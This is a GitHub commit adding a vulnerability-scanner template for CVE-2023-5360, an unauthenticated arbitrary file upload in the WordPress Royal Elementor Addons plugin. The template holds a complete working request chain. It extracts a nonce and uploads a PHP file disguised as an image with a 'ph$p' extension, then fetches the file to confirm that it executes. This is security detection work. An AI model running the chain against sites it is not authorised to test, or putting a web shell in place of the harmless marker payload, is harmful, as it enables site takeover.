Merge pull request #8409 from theamanrawat/patch-3

Create CVE-2023-5360.yaml
patch-1
Dhiyaneshwaran 2023-10-18 21:51:22 +05:30 committed by GitHub
commit c077ec0bc3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 89 additions and 0 deletions

View File

@ -0,0 +1,89 @@
id: CVE-2023-5360
info:
name: WordPress Royal Elementor Addons Plugin <= 1.3.78 - Arbitrary File Upload
author: theamanrawat
severity: critical
description: |
Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79
reference:
- https://wordpress.org/plugins/royal-elementor-addons/
- https://wpscan.com/vulnerability/281518ff-7816-4007-b712-63aed7828b34/
- https://nvd.nist.gov/vuln/detail/CVE-2023-5360
remediation: Fixed in 1.3.79
metadata:
verified: "true"
max-request: 3
publicwww-query: "/plugins/royal-elementor-addons/"
tags: cve,cve2023,rce,wpscan,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive
variables:
file: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin-ajax.php?action=wpr_addons_upload_file HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------318949277012917151102295043236
-----------------------------318949277012917151102295043236
Content-Disposition: form-data; name="uploaded_file"; filename="{{file}}.ph$p"
Content-Type: image/png
<?php echo md5("CVE-2023-5360");?>
-----------------------------318949277012917151102295043236
Content-Disposition: form-data; name="allowed_file_types"
ph$p
-----------------------------318949277012917151102295043236
Content-Disposition: form-data; name="triggering_event"
click
-----------------------------318949277012917151102295043236
Content-Disposition: form-data; name="wpr_addons_nonce"
{{nonce}}
-----------------------------318949277012917151102295043236--
- |
GET /wp-content/uploads/wpr-addons/forms/{{filename}}.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- "86398d3a90432d24901a7bbdcf1ab2ba"
condition: and
- type: word
part: header_3
words:
- "text/html"
- type: status
status:
- 200
extractors:
- type: regex
name: nonce
part: body_1
group: 1
regex:
- 'WprConfig\s*=\s*{[^}]*"nonce"\s*:\s*"([^"]*)"'
internal: true
- type: regex
name: filename
part: body_2
group: 1
regex:
- 'wp-content\\\/uploads\\\/wpr-addons\\\/forms\\\/(.*?).php'
internal: true